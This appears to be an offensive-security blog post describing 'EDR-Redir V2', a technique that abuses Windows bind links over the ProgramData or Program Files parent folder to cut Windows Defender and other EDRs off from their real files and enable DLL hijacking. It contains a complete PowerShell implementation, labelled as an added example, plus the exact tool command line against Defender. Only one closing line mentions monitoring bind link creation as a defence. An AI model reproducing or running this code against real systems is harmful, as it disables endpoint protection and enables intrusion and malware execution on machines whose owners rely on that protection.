EDR-Redir V2: Blind EDR With Fake Program Files


I. INTRODUCTION

In a previous article, I demonstrated how the Windows bind link feature can be used to block or redirect an Antivirus/EDR's access to its own executable folder. You can review that article via the link:

Using EDR-Redir To Break EDR Via Bind Link and Cloud Filter 

However, some EDRs protect their operating folders well enough that creating a bind link on those folders simply fails.

This time, I will upgrade EDR-Redir to version V2. It still relies on bind links, but uses them in a completely different way.

I will experiment with EDR-Redir V2 using Windows Defender on Windows 11. With this new approach, I'm quite confident it will work with many Antivirus/EDR solutions.

Find me on X to get the latest pentest and red team tricks that I've been researching: Two Seven One Three (@TwoSevenOneT) / X


II. MAIN SECTION

1. The Idea Behind Working With EDR-Redir V2

When software is installed on Windows, it typically resides in a subfolder of a well-known directory such as Program Files, Program Files (x86) or ProgramData.

Antivirus and EDR software are no exception; most of them are located in either Program Files or Program Files (x86). Windows Defender, however, is found in ProgramData.

To protect their operating folders, Antivirus and EDR products typically block writes to those folders. What they cannot do is block writes to the parent folder: if they blocked writes to Program Files itself, they would prevent any other software from being installed on the machine, which is an unacceptable inconvenience for users.

So why not think outside the box? Instead of creating a bind link to the EDR's folder, we could create a bind link to the Program Files folder, for example.

When dealing with the Program Files folder, we encounter the issue of ensuring that other software, aside from the EDR, functions normally. The idea here is to create bind links so that a folder points back to itself.

Figure: EDR-Redir V2 bind link pointing back to itself

The steps to implement this idea are as follows (I will provide an example using the Program Files folder):

  1. Enumerate all the subfolders of the Program Files folder.
  2. Create folders with the same names in a location you fully control (C:\TMP\TEMPDIR).
  3. Create bind links from each subfolder of Program Files to its counterpart in C:\TMP\TEMPDIR.
  4. Create the reverse bind links, from each folder in C:\TMP\TEMPDIR back to its counterpart in Program Files. This forms a loop, so access to a folder in Program Files circles back to the folder itself. Most importantly, the EDR's folder is skipped at this stage: it gets no link in either direction.
  5. Create a bind link from Program Files itself to C:\TMP\TEMPDIR. Because the EDR's folder has no link of its own, it is the only one that now resolves through TEMPDIR.
  6. At this point, you can perform DLL hijacking by dropping, into the EDR's folder under TEMPDIR, the DLLs or executables the EDR normally loads, so that your files are loaded in place of the EDR's.

Once these steps are successfully completed, we may be able to effectively redirect even the most stubborn types of EDRs.
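To make the five steps concrete, here is an added PowerShell implementation of the loop; it is not EDR-Redir's own code. It calls the documented CreateBindLink and RemoveBindLink functions from bindlink.h (Windows 11 24H2 or later, run as Administrator) through P/Invoke. The DLL name bindlink.dll, the function names, the sample paths and the marker-file check are assumptions made for this example.

```powershell
# Added example (not the EDR-Redir V2 source): implements the five-step
# bind link loop described above with the public CreateBindLink/RemoveBindLink
# API from bindlink.h (Windows 11 24H2+, must run as Administrator).
# Assumptions: the API is exported by bindlink.dll with the documented
# signatures; the paths and the marker file below are hypothetical.

Add-Type -Namespace Win32 -Name BindLink -MemberDefinition @'
[DllImport("bindlink.dll", CharSet = CharSet.Unicode, ExactSpelling = true)]
public static extern int CreateBindLink(
    string virtualPath, string backingPath, uint createBindLinkFlags,
    uint exceptionCount, IntPtr exceptionPaths);

[DllImport("bindlink.dll", CharSet = CharSet.Unicode, ExactSpelling = true)]
public static extern int RemoveBindLink(string virtualPath);
'@

$CREATE_BIND_LINK_FLAG_NONE = [uint32]0

function New-BindLink {
    param([string]$VirtualPath, [string]$BackingPath)
    # Opening $VirtualPath will now be served from $BackingPath.
    $hr = [Win32.BindLink]::CreateBindLink($VirtualPath, $BackingPath,
                                           $CREATE_BIND_LINK_FLAG_NONE, 0, [IntPtr]::Zero)
    if ($hr -ne 0) {
        throw ("CreateBindLink {0} -> {1} failed: 0x{2:X8}" -f $VirtualPath, $BackingPath, $hr)
    }
    Write-Host "bind link: $VirtualPath -> $BackingPath"
    return $VirtualPath
}

function Invoke-ParentFolderRedirect {
    param(
        [string]$Parent,     # e.g. 'C:\ProgramData\Microsoft'
        [string]$TempDir,    # e.g. 'C:\TMP\TEMPDIR'
        [string]$Exception   # e.g. 'C:\ProgramData\Microsoft\Windows Defender'
    )
    $created = New-Object System.Collections.Generic.List[string]
    $exceptionName = Split-Path -Leaf $Exception

    # Step 1: enumerate the subfolders of the parent.
    $subfolders = Get-ChildItem -LiteralPath $Parent -Directory -Force

    # Step 2: mirror the folder names under TempDir. The EDR folder is mirrored
    # too: its mirror is where the fake files will be dropped later.
    foreach ($d in $subfolders) {
        $null = New-Item -ItemType Directory -Force -Path (Join-Path $TempDir $d.Name)
    }

    foreach ($d in $subfolders) {
        if ($d.Name -ieq $exceptionName) { continue }   # no loop for the EDR folder
        $real   = $d.FullName
        $mirror = Join-Path $TempDir $d.Name
        # Step 3: Parent\X -> TempDir\X
        $created.Add((New-BindLink -VirtualPath $real -BackingPath $mirror))
        # Step 4: TempDir\X -> Parent\X, closing the loop so X keeps working
        $created.Add((New-BindLink -VirtualPath $mirror -BackingPath $real))
    }

    # Step 5: the parent itself. The exception folder has no link of its own,
    # so Parent\<exception> now resolves to TempDir\<exception>.
    $created.Add((New-BindLink -VirtualPath $Parent -BackingPath $TempDir))
    return $created
}

function Remove-ParentFolderRedirect {
    param([System.Collections.Generic.List[string]]$Links)
    # Tear down in reverse creation order: the parent link first, then the loops.
    for ($i = $Links.Count - 1; $i -ge 0; $i--) {
        $null = [Win32.BindLink]::RemoveBindLink($Links[$i])
    }
}

# Usage (paths as in the Windows Defender experiment; adjust for your target):
$parent    = 'C:\ProgramData\Microsoft'
$tempDir   = 'C:\TMP\TEMPDIR'
$exception = 'C:\ProgramData\Microsoft\Windows Defender'
$null = New-Item -ItemType Directory -Force -Path $tempDir

$links = Invoke-ParentFolderRedirect -Parent $parent -TempDir $tempDir -Exception $exception

# Functional check: a marker file dropped into the mirror of the exception
# folder must now be visible through the real path of that folder.
$marker = Join-Path (Join-Path $tempDir (Split-Path -Leaf $exception)) 'redir-marker.txt'
Set-Content -LiteralPath $marker -Value 'redirected'
$visible = Test-Path -LiteralPath (Join-Path $exception 'redir-marker.txt')
Write-Host "exception folder redirected through TEMPDIR: $visible"

# Cleanup when the experiment is over:
# Remove-ParentFolderRedirect -Links $links
```

The per-folder loops are created before the parent link, in the order the steps above list them, so that when the parent is redirected the exception folder is the only subfolder without a link of its own. Tear down in reverse order (parent link first) when you are finished, and expect the EDR to be effectively blind from the moment step 5 succeeds, so test this only on a machine you are prepared to reboot.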

2. Experimenting With EDR-Redir V2 Using Windows Defender

First, you can download EDR-Redir via the link below.

https://github.com/TwoSevenOneT/EDR-Redir


Windows Defender on Windows 11 lives under C:\ProgramData\Microsoft\Windows Defender, so C:\ProgramData\Microsoft is the parent folder I will target for the attack.

I will run EDR-Redir with the following parameters:

EDR-Redir.exe C:\ProgramData\Microsoft c:\TMP\TEMPDIR "C:\ProgramData\Microsoft\Windows Defender"

C:\ProgramData\Microsoft is the folder I need to redirect elsewhere.

C:\TMP\TEMPDIR is the target folder.

C:\ProgramData\Microsoft\Windows Defender is the exception folder: no link loop is created for it, so it is the one folder that actually gets redirected, which is what cuts Defender off from its real files.

Figure: EDR-Redir V2 running successfully against Windows Defender

During execution, EDR-Redir prints to the console each bind link it is about to create, which makes the process easy to follow. As shown in the results, I successfully redirected Windows Defender to C:\TMP\TEMPDIR.

Figure: EDR-Redir V2 successfully redirecting Windows Defender to another location

At this point, Windows Defender will always see the folder C:\TMP\TEMPDIR as the parent folder of its operating folder.

3. Demo Video

III. INFERENCE

Antivirus/EDR products can only protect their own operating folders; they cannot practically lock down the parent folders those directories live in. Once the parent folder is successfully attacked, the protection the EDR applies to its operating folder becomes meaningless.

When programming, many developers may not consider the possibility of a folder like Program Files being redirected. Therefore, I suspect that the list of EDRs affected by this technique will be quite extensive.

The defensive approach is to monitor the creation of bind links whose virtual path covers folders like Program Files, Program Files (x86) or ProgramData, so that these parent folders cannot be tampered with by an attacker.

IV. READING

Some books you should read to sharpen your cybersecurity skills, especially in offensive security:

Books on Programming and Cybersecurity recommended by Zero Salarium Researchers

Essential hardware tools that every security researcher and hacker should have in their toolkit:

Hardware Tools For Security Researcher and Hacker


Author of the article: Two Seven One Three
